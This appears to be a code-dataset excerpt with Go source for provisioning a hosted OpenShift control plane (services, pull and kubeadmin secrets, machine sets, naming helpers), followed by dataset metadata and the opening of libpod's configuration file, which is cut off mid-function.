requiredObj, err := runtime.Decode(coreCodecs.UniversalDecoder(corev1.SchemeGroupVersion), objBytes)
if err != nil {
return err
}
secret, ok := requiredObj.(*corev1.Secret)
if !ok {
return fmt.Errorf("object in %s is not a secret", fileName)
}
_, err = client.CoreV1().Secrets(namespace).Create(secret)
return err
}
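// The helpers below create the Services that expose the hosted control plane from the
// management cluster: kube-apiserver, openvpn-server and oauth-openshift as NodePort
// Services (returning the allocated node port), and openshift-apiserver as a
// ClusterIP Service (returning its cluster IP).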
func createKubeAPIServerService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "kube-apiserver"
svc.Spec.Selector = map[string]string{"app": "kube-apiserver"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Port: 6443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(6443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createVPNServerService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "openvpn-server"
svc.Spec.Selector = map[string]string{"app": "openvpn-server"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Port: 1194,
Protocol: corev1.ProtocolUDP,
TargetPort: intstr.FromInt(1194),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createOpenshiftService(client kubeclient.Interface, namespace string) (string, error) {
svc := &corev1.Service{}
svc.Name = "openshift-apiserver"
svc.Spec.Selector = map[string]string{"app": "openshift-apiserver"}
svc.Spec.Type = corev1.ServiceTypeClusterIP
svc.Spec.Ports = []corev1.ServicePort{
{
Name: "https",
Port: 443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(8443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return "", err
}
return svc.Spec.ClusterIP, nil
}
func createOauthService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "oauth-openshift"
svc.Spec.Selector = map[string]string{"app": "oauth-openshift"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Name: "https",
Port: 443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(6443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createPullSecret(client kubeclient.Interface, namespace, data string) error {
secret := &corev1.Secret{}
secret.Name = "pull-secret"
secret.Data = map[string][]byte{".dockerconfigjson": []byte(data)}
secret.Type = corev1.SecretTypeDockerConfigJson
_, err := client.CoreV1().Secrets(namespace).Create(secret)
if err != nil {
return err
}
retry.RetryOnConflict(retry.DefaultRetry, func() error {
sa, err := client.CoreV1().ServiceAccounts(namespace).Get("default", metav1.GetOptions{})
if err != nil {
return err
}
sa.ImagePullSecrets = append(sa.ImagePullSecrets, corev1.LocalObjectReference{Name: "pull-secret"})
_, err = client.CoreV1().ServiceAccounts(namespace).Update(sa)
return err
})
return nil
}
func generateTargetPullSecret(data []byte, fileName string) error {
secret := &corev1.Secret{}
secret.Name = "pull-secret"
secret.Namespace = "openshift-config"
secret.Data = map[string][]byte{".dockerconfigjson": data}
secret.Type = corev1.SecretTypeDockerConfigJson
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
configMap := &corev1.ConfigMap{}
configMap.APIVersion = "v1"
configMap.Kind = "ConfigMap"
configMap.Name = "user-manifest-pullsecret"
configMap.Data = map[string]string{"data": string(secretBytes)}
configMapBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), configMap)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, configMapBytes, 0644)
}
func getPullSecret(client kubeclient.Interface) (string, error) {
secret, err := client.CoreV1().Secrets("openshift-config").Get("pull-secret", metav1.GetOptions{})
if err != nil {
return "", err
}
pullSecret, ok := secret.Data[".dockerconfigjson"]
if !ok {
return "", fmt.Errorf("did not find pull secret data in secret")
}
return string(pullSecret), nil
}
func getAWSCredentials(client kubeclient.Interface) (string, string, error) {
secret, err := client.CoreV1().Secrets("kube-system").Get("aws-creds", metav1.GetOptions{})
if err != nil {
return "", "", err
}
key, ok := secret.Data["aws_access_key_id"]
if !ok {
return "", "", fmt.Errorf("did not find an AWS access key")
}
secretKey, ok := secret.Data["aws_secret_access_key"]
if !ok {
return "", "", fmt.Errorf("did not find an AWS secret access key")
}
return string(key), string(secretKey), nil
}
func getMachineNames(client dynamic.Interface) ([]string, error) {
machineGroupVersion, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return nil, err
}
machineGroupVersionResource := machineGroupVersion.WithResource("machines")
list, err := client.Resource(machineGroupVersionResource).Namespace("openshift-machine-api").List(metav1.ListOptions{})
if err != nil {
return nil, err
}
names := []string{}
for _, m := range list.Items {
names = append(names, m.GetName())
}
return names, nil
}
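// getMachineInfo returns the EC2 instance ID and internal IP address of the first
// management-cluster machine whose name starts with prefix, read from the machine's
// provider status and addresses.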
func getMachineInfo(client dynamic.Interface, machineNames []string, prefix string) (string, string, error) {
name := ""
for _, machineName := range machineNames {
if strings.HasPrefix(machineName, prefix) {
name = machineName
break
}
}
if name == "" {
return "", "", fmt.Errorf("did not find machine with prefix %s", prefix)
}
machineGroupVersion, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return "", "", err
}
machineGroupVersionResource := machineGroupVersion.WithResource("machines")
machine, err := client.Resource(machineGroupVersionResource).Namespace("openshift-machine-api").Get(name, metav1.GetOptions{})
if err != nil {
return "", "", err
}
instanceID, exists, err := unstructured.NestedString(machine.Object, "status", "providerStatus", "instanceId")
if !exists || err != nil {
return "", "", fmt.Errorf("did not find instanceId on machine object: %v", err)
}
addresses, exists, err := unstructured.NestedSlice(machine.Object, "status", "addresses")
if !exists || err != nil {
return "", "", fmt.Errorf("did not find addresses on machine object: %v", err)
}
machineIP := ""
for _, addr := range addresses {
addrType, _, err := unstructured.NestedString(addr.(map[string]interface{}), "type")
if err != nil {
return "", "", fmt.Errorf("cannot get address type: %v", err)
}
if addrType != "InternalIP" {
continue
}
machineIP, _, err = unstructured.NestedString(addr.(map[string]interface{}), "address")
if err != nil {
return "", "", fmt.Errorf("cannot get machine address: %v", err)
}
}
if machineIP == "" {
return "", "", fmt.Errorf("could not find machine internal IP")
}
return instanceID, machineIP, nil
}
func getSSHPublicKey(client dynamic.Interface) ([]byte, error) {
machineConfigGroupVersion, err := schema.ParseGroupVersion("machineconfiguration.openshift.io/v1")
if err != nil {
return nil, err
}
machineConfigGroupVersionResource := machineConfigGroupVersion.WithResource("machineconfigs")
obj, err := client.Resource(machineConfigGroupVersionResource).Get("99-master-ssh", metav1.GetOptions{})
if err != nil {
return nil, err
}
users, exists, err := unstructured.NestedSlice(obj.Object, "spec", "config", "passwd", "users")
if !exists || err != nil {
return nil, fmt.Errorf("could not find users slice in ssh machine config: %v", err)
}
keys, exists, err := unstructured.NestedStringSlice(users[0].(map[string]interface{}), "sshAuthorizedKeys")
if !exists || err != nil {
return nil, fmt.Errorf("could not find authorized keys for machine config: %v", err)
}
return []byte(keys[0]), nil
}
func getInfrastructureInfo(client dynamic.Interface) (string, string, error) {
infraGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
infraGroupVersionResource := infraGroupVersion.WithResource("infrastructures")
obj, err := client.Resource(infraGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
infraName, exists, err := unstructured.NestedString(obj.Object, "status", "infrastructureName")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the infrastructure name in the infrastructure resource: %v", err)
}
region, exists, err := unstructured.NestedString(obj.Object, "status", "platformStatus", "aws", "region")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the AWS region in the infrastructure resource: %v", err)
}
return infraName, region, nil
}
func getDNSZoneInfo(client dynamic.Interface) (string, string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
dnsGroupVersionResource := configGroupVersion.WithResource("dnses")
obj, err := client.Resource(dnsGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
publicZoneID, exists, err := unstructured.NestedString(obj.Object, "spec", "publicZone", "id")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the dns public zone id in the dns resource: %v", err)
}
domain, exists, err := unstructured.NestedString(obj.Object, "spec", "baseDomain")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the dns base domain in the dns resource: %v", err)
}
parts := strings.Split(domain, ".")
baseDomain := strings.Join(parts[1:], ".")
return publicZoneID, baseDomain, nil
}
// loadConfig loads a REST Config as per the rules specified in GetConfig
func loadConfig() (*rest.Config, error) {
if len(os.Getenv("KUBECONFIG")) > 0 {
return clientcmd.BuildConfigFromFlags("", os.Getenv("KUBECONFIG"))
}
if c, err := rest.InClusterConfig(); err == nil {
return c, nil
}
if usr, err := user.Current(); err == nil {
if c, err := clientcmd.BuildConfigFromFlags(
"", filepath.Join(usr.HomeDir, ".kube", "config")); err == nil {
return c, nil
}
}
return nil, fmt.Errorf("could not locate a kubeconfig")
}
func getReleaseImage(client dynamic.Interface) (string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", err
}
clusterVersionGVR := configGroupVersion.WithResource("clusterversions")
obj, err := client.Resource(clusterVersionGVR).Get("version", metav1.GetOptions{})
if err != nil {
return "", err
}
releaseImage, exists, err := unstructured.NestedString(obj.Object, "status", "desired", "image")
if !exists || err != nil {
return "", fmt.Errorf("cannot find release image in cluster version resource")
}
return releaseImage, nil
}
func getNetworkInfo(client dynamic.Interface) (string, string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
networkGroupVersionResource := configGroupVersion.WithResource("networks")
obj, err := client.Resource(networkGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
serviceNetworks, exists, err := unstructured.NestedSlice(obj.Object, "status", "serviceNetwork")
if !exists || err != nil || len(serviceNetworks) == 0 {
return "", "", fmt.Errorf("could not find service networks in the network status: %v", err)
}
serviceCIDR := serviceNetworks[0].(string)
podNetworks, exists, err := unstructured.NestedSlice(obj.Object, "status", "clusterNetwork")
if !exists || err != nil || len(podNetworks) == 0 {
return "", "", fmt.Errorf("could not find cluster networks in the network status: %v", err)
}
podCIDR, exists, err := unstructured.NestedString(podNetworks[0].(map[string]interface{}), "cidr")
if !exists || err != nil {
return "", "", fmt.Errorf("cannot find cluster network cidr: %v", err)
}
return serviceCIDR, podCIDR, nil
}
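// generateWorkerMachineset clones the management cluster's worker MachineSet for the
// given zone, strips server-populated fields, renames it for the hosted cluster, sets
// the worker replica count, points it at the <namespace>-user-data secret and the
// given network load balancer, and writes the result as JSON to fileName.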
func generateWorkerMachineset(client dynamic.Interface, infraName, zone, namespace, lbName, fileName string) error {
machineGV, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return err
}
machineSetGVR := machineGV.WithResource("machinesets")
obj, err := client.Resource(machineSetGVR).Namespace("openshift-machine-api").Get(fmt.Sprintf("%s-worker-%s", infraName, zone), metav1.GetOptions{})
if err != nil {
return err
}
workerName := generateMachineSetName(infraName, namespace, "worker")
object := obj.Object
unstructured.RemoveNestedField(object, "status")
unstructured.RemoveNestedField(object, "metadata", "creationTimestamp")
unstructured.RemoveNestedField(object, "metadata", "generation")
unstructured.RemoveNestedField(object, "metadata", "resourceVersion")
unstructured.RemoveNestedField(object, "metadata", "selfLink")
unstructured.RemoveNestedField(object, "metadata", "uid")
unstructured.RemoveNestedField(object, "spec", "template", "spec", "metadata")
unstructured.RemoveNestedField(object, "spec", "template", "spec", "providerSpec", "value", "publicIp")
unstructured.SetNestedField(object, int64(workerMachineSetCount), "spec", "replicas")
unstructured.SetNestedField(object, workerName, "metadata", "name")
unstructured.SetNestedField(object, workerName, "spec", "selector", "matchLabels", "machine.openshift.io/cluster-api-machineset")
unstructured.SetNestedField(object, workerName, "spec", "template", "metadata", "labels", "machine.openshift.io/cluster-api-machineset")
unstructured.SetNestedField(object, fmt.Sprintf("%s-user-data", namespace), "spec", "template", "spec", "providerSpec", "value", "userDataSecret", "name")
loadBalancer := map[string]interface{}{}
unstructured.SetNestedField(loadBalancer, lbName, "name")
unstructured.SetNestedField(loadBalancer, "network", "type")
loadBalancers := []interface{}{loadBalancer}
unstructured.SetNestedSlice(object, loadBalancers, "spec", "template", "spec", "providerSpec", "value", "loadBalancers")
machineSetBytes, err := json.Marshal(object)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, machineSetBytes, 0644)
}
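// generateUserDataSecret writes a Secret manifest for openshift-machine-api whose
// userData is a minimal ignition config appending the worker.ign file served from the
// given S3 bucket.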
func generateUserDataSecret(namespace, bucketName, fileName string) error {
secret := &corev1.Secret{}
secret.Kind = "Secret"
secret.APIVersion = "v1"
secret.Name = fmt.Sprintf("%s-user-data", namespace)
secret.Namespace = "openshift-machine-api"
disableTemplatingValue := []byte(base64.StdEncoding.EncodeToString([]byte("true")))
userDataValue := []byte(fmt.Sprintf(`{"ignition":{"config":{"append":[{"source":"https://%s.s3.amazonaws.com/worker.ign","verification":{}}]},"security":{},"timeouts":{},"version":"2.2.0"},"networkd":{},"passwd":{},"storage":{},"systemd":{}}`, bucketName))
secret.Data = map[string][]byte{
"disableTemplating": disableTemplatingValue,
"userData": userDataValue,
}
secretBytes, err := json.Marshal(secret)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, secretBytes, 0644)
}
func copyFile(src, dest string) error {
in, err := os.Open(src)
if err != nil {
return err
}
defer in.Close()
out, err := os.Create(dest)
if err != nil {
return err
}
defer out.Close()
_, err = io.Copy(out, in)
return err
}
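// ensurePrivilegedSCC adds the hosted cluster namespace's default service account to
// the users list of the privileged SecurityContextConstraints (if not already present)
// so that the control plane pods created there can run privileged.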
func ensurePrivilegedSCC(client dynamic.Interface, namespace string) error {
securityGV, err := schema.ParseGroupVersion("security.openshift.io/v1")
if err != nil {
return err
}
sccGVR := securityGV.WithResource("securitycontextconstraints")
obj, err := client.Resource(sccGVR).Get("privileged", metav1.GetOptions{})
if err != nil {
return err
}
users, exists, err := unstructured.NestedStringSlice(obj.Object, "users")
if err != nil {
return err
}
userSet := sets.NewString()
if exists {
userSet.Insert(users...)
}
svcAccount := fmt.Sprintf("system:serviceaccount:%s:default", namespace)
if userSet.Has(svcAccount) {
// No need to update anything, service account already has privileged SCC
return nil
}
userSet.Insert(svcAccount)
if err = unstructured.SetNestedStringSlice(obj.Object, userSet.List(), "users"); err != nil {
return err
}
_, err = client.Resource(sccGVR).Update(obj, metav1.UpdateOptions{})
return err
}
func generateKubeadminPasswordTargetSecret(password string, fileName string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "kubeadmin"
secret.Namespace = "kube-system"
passwordHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
return err
}
secret.Data = map[string][]byte{"kubeadmin": passwordHash}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
configMap := &corev1.ConfigMap{}
configMap.APIVersion = "v1"
configMap.Kind = "ConfigMap"
configMap.Name = "user-manifest-kubeadmin-password"
configMap.Data = map[string]string{"data": string(secretBytes)}
configMapBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), configMap)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, configMapBytes, 0644)
}
func generateKubeadminPasswordSecret(password string, fileName string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "kubeadmin-password"
secret.Data = map[string][]byte{"password": []byte(password)}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, secretBytes, 0644)
}
func generateKubeconfigSecret(kubeconfigFile, manifestFilename string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "admin-kubeconfig"
kubeconfigBytes, err := ioutil.ReadFile(kubeconfigFile)
if err != nil {
return err
}
secret.Data = map[string][]byte{"kubeconfig": kubeconfigBytes}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
return ioutil.WriteFile(manifestFilename, secretBytes, 0644)
}
func updateOAuthDeployment(client kubeclient.Interface, namespace string) error {
d, err := client.AppsV1().Deployments(namespace).Get("oauth-openshift", metav1.GetOptions{})
if err != nil {
return err
}
annotations := d.Spec.Template.ObjectMeta.Annotations
if annotations == nil {
annotations = map[string]string{}
}
annotations["deployment-refresh"] = fmt.Sprintf("%v", time.Now())
d.Spec.Template.ObjectMeta.Annotations = annotations
_, err = client.AppsV1().Deployments(namespace).Update(d)
return err
}
func generateImageRegistrySecret() string {
num := make([]byte, 64)
rand.Read(num)
return hex.EncodeToString(num)
}
func generateKubeadminPassword() (string, error) {
const (
lowerLetters = "abcdefghijkmnopqrstuvwxyz"
upperLetters = "ABCDEFGHIJKLMNPQRSTUVWXYZ"
digits = "23456789"
all = lowerLetters + upperLetters + digits
length = 23
)
var password string
for i := 0; i < length; i++ {
n, err := crand.Int(crand.Reader, big.NewInt(int64(len(all))))
if err != nil {
return "", err
}
newchar := string(all[n.Int64()])
if password == "" {
password = newchar
}
if i < length-1 {
n, err = crand.Int(crand.Reader, big.NewInt(int64(len(password)+1)))
if err != nil {
return "", err
}
j := n.Int64()
password = password[0:j] + newchar + password[j:]
}
}
pw := []rune(password)
for _, replace := range []int{5, 11, 17} {
pw[replace] = '-'
}
return string(pw), nil
}
func getTargetClusterConfig(pkiDir string) (*rest.Config, error) {
return clientcmd.BuildConfigFromFlags("", filepath.Join(pkiDir, "admin.kubeconfig"))
}
func generateLBResourceName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 32)
}
func generateBucketName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 63)
}
func generateMachineSetName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 43)
}
// getName returns a name given a base ("deployment-5") and a suffix ("deploy")
// It will first attempt to join them with a dash. If the resulting name is longer
// than maxLength: if the suffix is too long, it will truncate the base name and add
// an 8-character hash of the [base]-[suffix] string. If the suffix is not too long,
// it will truncate the base, add the hash of the base and return [base]-[hash]-[suffix]
func getName(base, suffix string, maxLength int) string {
if maxLength <= 0 {
return ""
}
name := fmt.Sprintf("%s-%s", base, suffix)
if len(name) <= maxLength {
return name
}
baseLength := maxLength - 10 /*length of -hash-*/ - len(suffix)
// if the suffix is too long, ignore it
if baseLength < 0 {
prefix := base[0:min(len(base), max(0, maxLength-9))]
// Calculate hash on initial base-suffix string
shortName := fmt.Sprintf("%s-%s", prefix, hash(name))
return shortName[:min(maxLength, len(shortName))]
}
prefix := base[0:baseLength]
// Calculate hash on initial base-suffix string
return fmt.Sprintf("%s-%s-%s", prefix, hash(base), suffix)
}
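// exampleGetName is an illustrative sketch (not part of the original file; the
// names are made up) showing getName's length guarantee. The exact 8-character
// suffix depends on the FNV-1a digest, so only the shape of the result matters.
func exampleGetName() []string {
	return []string{
		// Fits within 32 characters: base and suffix are simply joined with a dash.
		getName("infra-cluster", "ext-lb", 32),
		// Too long: the base is truncated and an 8-character hash is inserted,
		// yielding "<truncated base>-<hash>-ext-lb", never more than 32 characters.
		getName("a-very-long-infrastructure-and-cluster-name", "ext-lb", 32),
	}
}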
// max returns the greater of its 2 inputs
func max(a, b int) int {
if b > a {
return b
}
return a
}
// min returns the lesser of its 2 inputs
func min(a, b int) int {
if b < a {
return b
}
return a
}
// hash calculates the hexadecimal representation (8-chars)
// of the hash of the passed in string using the FNV-a algorithm
func hash(s string) string {
hash := fnv.New32a()
hash.Write([]byte(s))
intHash := hash.Sum32()
result := fmt.Sprintf("%08x", intHash)
return result
}
|
[
"\"KUBECONFIG\"",
"\"KUBECONFIG\""
] |
[] |
[
"KUBECONFIG"
] |
[]
|
["KUBECONFIG"]
|
go
| 1 | 0 | |
libpod/config/config.go
|
package config
import (
"bytes"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"github.com/BurntSushi/toml"
"github.com/containers/libpod/libpod/define"
"github.com/containers/libpod/pkg/cgroups"
"github.com/containers/libpod/pkg/rootless"
"github.com/containers/libpod/pkg/util"
"github.com/containers/storage"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
const (
// _defaultTransport is a prefix that we apply to an image name to check
// docker hub first for the image.
_defaultTransport = "docker://"
// _rootlessConfigPath is the path to the rootless libpod.conf in $HOME.
_rootlessConfigPath = ".config/containers/libpod.conf"
// _conmonMinMajorVersion is the major version required for conmon.
_conmonMinMajorVersion = 2
// _conmonMinMinorVersion is the minor version required for conmon.
_conmonMinMinorVersion = 0
// _conmonMinPatchVersion is the sub-minor version required for conmon.
_conmonMinPatchVersion = 1
// _conmonVersionFormatErr is used when the expected version format of conmon
// has changed.
_conmonVersionFormatErr = "conmon version changed format"
// InstallPrefix is the prefix where podman will be installed.
// It can be overridden at build time.
_installPrefix = "/usr"
// EtcDir is the sysconfdir where podman should look for system config files.
// It can be overridden at build time.
_etcDir = "/etc"
// SeccompDefaultPath defines the default seccomp path.
SeccompDefaultPath = _installPrefix + "/share/containers/seccomp.json"
// SeccompOverridePath if this exists it overrides the default seccomp path.
SeccompOverridePath = _etcDir + "/crio/seccomp.json"
// _rootConfigPath is the path to the libpod configuration file
// This file is loaded to replace the builtin default config before
// runtime options (e.g. WithStorageConfig) are applied.
// If it is not present, the builtin default config is used instead
// This path can be overridden when the runtime is created by using
// NewRuntimeFromConfig() instead of NewRuntime().
_rootConfigPath = _installPrefix + "/share/containers/libpod.conf"
// _rootOverrideConfigPath is the path to an override for the default libpod
// configuration file. If OverrideConfigPath exists, it will be used in
// place of the configuration file pointed to by ConfigPath.
_rootOverrideConfigPath = _etcDir + "/containers/libpod.conf"
)
// SetOptions contains a subset of options in a Config. It's used to indicate if
// a given option has either been set by the user or by a parsed libpod
// configuration file. If not, the corresponding option might be overwritten by
// values from the database. This behavior guarantees backwards compatibility with
// older versions of libpod and Podman.
type SetOptions struct {
// StorageConfigRunRootSet indicates if the RunRoot has been explicitly set
// by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigRunRootSet bool `toml:"-"`
// StorageConfigGraphRootSet indicates if the RunRoot has been explicitly
// set by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigGraphRootSet bool `toml:"-"`
// StorageConfigGraphDriverNameSet indicates if the GraphDriverName has been
// explicitly set by the config or by the user. It's required to guarantee
// backwards compatibility with older versions of libpod for which we must
// query the database configuration. Not included in the on-disk config.
StorageConfigGraphDriverNameSet bool `toml:"-"`
// VolumePathSet indicates if the VolumePath has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
VolumePathSet bool `toml:"-"`
// StaticDirSet indicates if the StaticDir has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
StaticDirSet bool `toml:"-"`
// TmpDirSet indicates if the TmpDir has been explicitly set by the config
// or by the user. It's required to guarantee backwards compatibility with
// older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
TmpDirSet bool `toml:"-"`
}
// Config contains configuration options used to set up a libpod runtime
type Config struct {
// NOTE: when changing this struct, make sure to update (*Config).Merge().
// SetOptions contains a subset of config options. It's used to indicate if
// a given option has either been set by the user or by a parsed libpod
// configuration file. If not, the corresponding option might be
// overwritten by values from the database. This behavior guarantees
// backwards compatibility with older versions of libpod and Podman.
SetOptions
// StateType is the type of the backing state store. Avoid using multiple
// values for this with the same containers/storage configuration on the
// same system. Different state types do not interact, and each will see a
// separate set of containers, which may cause conflicts in
// containers/storage. As such this is not exposed via the config file.
StateType define.RuntimeStateStore `toml:"-"`
// StorageConfig is the configuration used by containers/storage. Not
// included in the on-disk config, use the dedicated containers/storage
// configuration file instead.
StorageConfig storage.StoreOptions `toml:"-"`
// VolumePath is the default location that named volumes will be created
// under. This convention is followed by the default volume driver, but
// may not be by other drivers.
VolumePath string `toml:"volume_path,omitempty"`
// ImageDefaultTransport is the default transport method used to fetch
// images.
ImageDefaultTransport string `toml:"image_default_transport,omitempty"`
// SignaturePolicyPath is the path to a signature policy to use for
// validating images. If left empty, the containers/image default signature
// policy will be used.
SignaturePolicyPath string `toml:"signature_policy_path,omitempty"`
// OCIRuntime is the OCI runtime to use.
OCIRuntime string `toml:"runtime,omitempty"`
// OCIRuntimes are the set of configured OCI runtimes (default is runc).
OCIRuntimes map[string][]string `toml:"runtimes,omitempty"`
// RuntimeSupportsJSON is the list of the OCI runtimes that support
// --format=json.
RuntimeSupportsJSON []string `toml:"runtime_supports_json,omitempty"`
// RuntimeSupportsNoCgroups is a list of OCI runtimes that support
// running containers without CGroups.
RuntimeSupportsNoCgroups []string `toml:"runtime_supports_nocgroups,omitempty"`
// RuntimePath is the path to OCI runtime binary for launching containers.
// The first path pointing to a valid file will be used This is used only
// when there are no OCIRuntime/OCIRuntimes defined. It is used only to be
// backward compatible with older versions of Podman.
RuntimePath []string `toml:"runtime_path,omitempty"`
// ConmonPath is the path to the Conmon binary used for managing containers.
// The first path pointing to a valid file will be used.
ConmonPath []string `toml:"conmon_path,omitempty"`
// ConmonEnvVars are environment variables to pass to the Conmon binary
// when it is launched.
ConmonEnvVars []string `toml:"conmon_env_vars,omitempty"`
// CgroupManager is the cgroup manager to use. Valid values are "cgroupfs"
// and "systemd".
CgroupManager string `toml:"cgroup_manager,omitempty"`
// InitPath is the path to the container-init binary.
InitPath string `toml:"init_path,omitempty"`
// StaticDir is the path to a persistent directory to store container
// files.
StaticDir string `toml:"static_dir,omitempty"`
// TmpDir is the path to a temporary directory to store per-boot container
// files. Must be stored in a tmpfs.
TmpDir string `toml:"tmp_dir,omitempty"`
// MaxLogSize is the maximum size of container logfiles.
MaxLogSize int64 `toml:"max_log_size,omitempty"`
// NoPivotRoot sets whether to set no-pivot-root in the OCI runtime.
NoPivotRoot bool `toml:"no_pivot_root,omitempty"`
// CNIConfigDir sets the directory where CNI configuration files are
// stored.
CNIConfigDir string `toml:"cni_config_dir,omitempty"`
// CNIPluginDir sets a number of directories where the CNI network
// plugins can be located.
CNIPluginDir []string `toml:"cni_plugin_dir,omitempty"`
// CNIDefaultNetwork is the network name of the default CNI network
// to attach pods to.
CNIDefaultNetwork string `toml:"cni_default_network,omitempty"`
// HooksDir holds paths to the directories containing hooks
// configuration files. When the same filename is present in
// multiple directories, the file in the directory listed last in
// this slice takes precedence.
HooksDir []string `toml:"hooks_dir,omitempty"`
// DefaultMountsFile is the path to the default mounts file for testing
// purposes only.
DefaultMountsFile string `toml:"-"`
// Namespace is the libpod namespace to use. Namespaces are used to create
// scopes to separate containers and pods in the state. When namespace is
// set, libpod will only view containers and pods in the same namespace. All
// containers and pods created will default to the namespace set here. A
// namespace of "", the empty string, is equivalent to no namespace, and all
// containers and pods will be visible. The default namespace is "".
Namespace string `toml:"namespace,omitempty"`
// InfraImage is the image a pod infra container will use to manage
// namespaces.
InfraImage string `toml:"infra_image,omitempty"`
// InfraCommand is the command run to start up a pod infra container.
InfraCommand string `toml:"infra_command,omitempty"`
// EnablePortReservation determines whether libpod will reserve ports on the
// host when they are forwarded to containers. When enabled, when ports are
// forwarded to containers, they are held open by conmon as long as the
// container is running, ensuring that they cannot be reused by other
// programs on the host. However, this can cause significant memory usage if
// a container has many ports forwarded to it. Disabling this can save
// memory.
EnablePortReservation bool `toml:"enable_port_reservation,omitempty"`
// EnableLabeling indicates whether libpod will support container labeling.
EnableLabeling bool `toml:"label,omitempty"`
// NetworkCmdPath is the path to the slirp4netns binary.
NetworkCmdPath string `toml:"network_cmd_path,omitempty"`
// NumLocks is the number of locks to make available for containers and
// pods.
NumLocks uint32 `toml:"num_locks,omitempty"`
// LockType is the type of locking to use.
LockType string `toml:"lock_type,omitempty"`
// EventsLogger determines where events should be logged.
EventsLogger string `toml:"events_logger,omitempty"`
// EventsLogFilePath is where the events log is stored.
EventsLogFilePath string `toml:"events_logfile_path,omitempty"`
// DetachKeys is the sequence of keys used to detach a container.
DetachKeys string `toml:"detach_keys,omitempty"`
// SDNotify tells Libpod to allow containers to notify the host systemd of
// readiness using the SD_NOTIFY mechanism.
SDNotify bool `toml:",omitempty"`
// CgroupCheck indicates the configuration has been rewritten after an
// upgrade to Fedora 31 to change the default OCI runtime for cgroupsv2.
CgroupCheck bool `toml:"cgroup_check,omitempty"`
}
// DBConfig is a set of Libpod runtime configuration settings that are saved in
// a State when it is first created, and can subsequently be retrieved.
type DBConfig struct {
LibpodRoot string
LibpodTmp string
StorageRoot string
StorageTmp string
GraphDriver string
VolumePath string
}
// readConfigFromFile reads the specified config file at `path` and attempts to
// unmarshal its content into a Config.
func readConfigFromFile(path string) (*Config, error) {
var config Config
